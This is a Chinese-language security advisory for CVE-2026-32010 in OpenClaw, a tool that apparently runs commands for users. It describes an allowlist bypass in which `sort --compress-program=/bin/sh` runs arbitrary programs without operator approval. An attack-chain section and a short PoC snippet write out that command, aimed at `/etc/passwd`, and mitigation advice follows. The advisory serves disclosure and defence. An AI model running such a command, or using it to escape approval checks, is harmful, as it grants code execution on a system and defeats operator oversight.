IPBUF安全漏洞报告
English
CVE-2026-32010 CVSS 6.3 中危

CVE-2026-32010 OpenClaw安全列表绕过漏洞

披露日期: 2026-03-19

漏洞信息

漏洞编号
CVE-2026-32010
漏洞类型
安全列表绕过
CVSS评分
6.3 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

安全列表绕过命令执行OpenClawCVE-2026-32010

漏洞概述

OpenClaw在2026.2.22之前的版本中存在安全列表绕过漏洞。该漏洞出现在safe-bin配置机制中,当用户将`sort`工具手动添加到`tools.exec.safeBins`时,由于对参数过滤不严,攻击者可利用`sort`命令的`--compress-program`参数绕过允许列表限制。即使启用了`ask=on-miss`模式,攻击者仍可在未经操作员批准的情况下执行任意外部程序,从而完全控制受影响系统。

技术细节

该漏洞的核心原理在于对列入白名单的可信二进制文件的参数验证缺失。OpenClaw通过`tools.exec.safeBins`配置允许执行的程序,并结合`ask=on-miss`机制拦截未授权命令。但该机制未能有效控制传递给白名单程序的参数。当管理员将`sort`命令加入安全列表时,攻击者利用`sort`命令内置的`--compress-program`参数发起攻击。该参数原本用于指定处理中间数据的压缩工具(如gzip),但它接受任意文件路径作为参数。通过构造如`sort --compress-program=/bin/bash`的命令,攻击者可以欺骗OpenClaw执行任意脚本或二进制文件。由于`sort`本身在白名单内,OpenClaw会直接放行该执行请求,导致安全策略完全失效,攻击者从而获得执行任意代码的能力,严重威胁系统安全。

攻击链分析

STEP 1
侦察
攻击者确认目标系统运行OpenClaw小于2026.2.22的版本,并探测`tools.exec.safeBins`配置中是否包含`sort`工具。
STEP 2
武器化
攻击者利用`sort`命令的`--compress-program`参数特性,构造包含恶意程序路径(如`/bin/bash`或恶意脚本)的命令载荷。
STEP 3
投递
攻击者通过OpenClaw的接口提交包含恶意参数的`sort`命令。
STEP 4
利用
OpenClaw检测到`sort`在白名单中,直接放行该请求并调用系统`sort`程序。
STEP 5
执行
系统`sort`程序解析`--compress-program`参数,并启动攻击者指定的任意外部程序,导致代码执行。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-32010 # Scenario: OpenClaw < 2026.2.22 with 'sort' in tools.exec.safeBins # The attacker inputs a command that triggers sort with the dangerous flag # Payload to execute arbitrary commands (e.g., /bin/sh) # OpenClaw interprets this as a safe 'sort' operation but executes the payload PAYLOAD="/bin/sh" INPUT_FILE="/etc/passwd" # Construct the malicious command using the --compress-program flag # This flag tells sort to use the specified program for compression EXPLOIT_CMD="sort --compress-program=${PAYLOAD} ${INPUT_FILE}" # Execute via OpenClaw's interface (simulated) # The system sees 'sort' (allowed) but runs '/bin/sh' echo "Executing exploit: ${EXPLOIT_CMD}"

影响范围

OpenClaw < 2026.2.22

防御指南

临时缓解措施
如果无法立即升级,请从OpenClaw的`tools.exec.safeBins`配置中移除`sort`工具,以阻断攻击者利用该参数进行绕过的路径。同时,应严格监控系统中由`sort`进程衍生的异常子进程。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表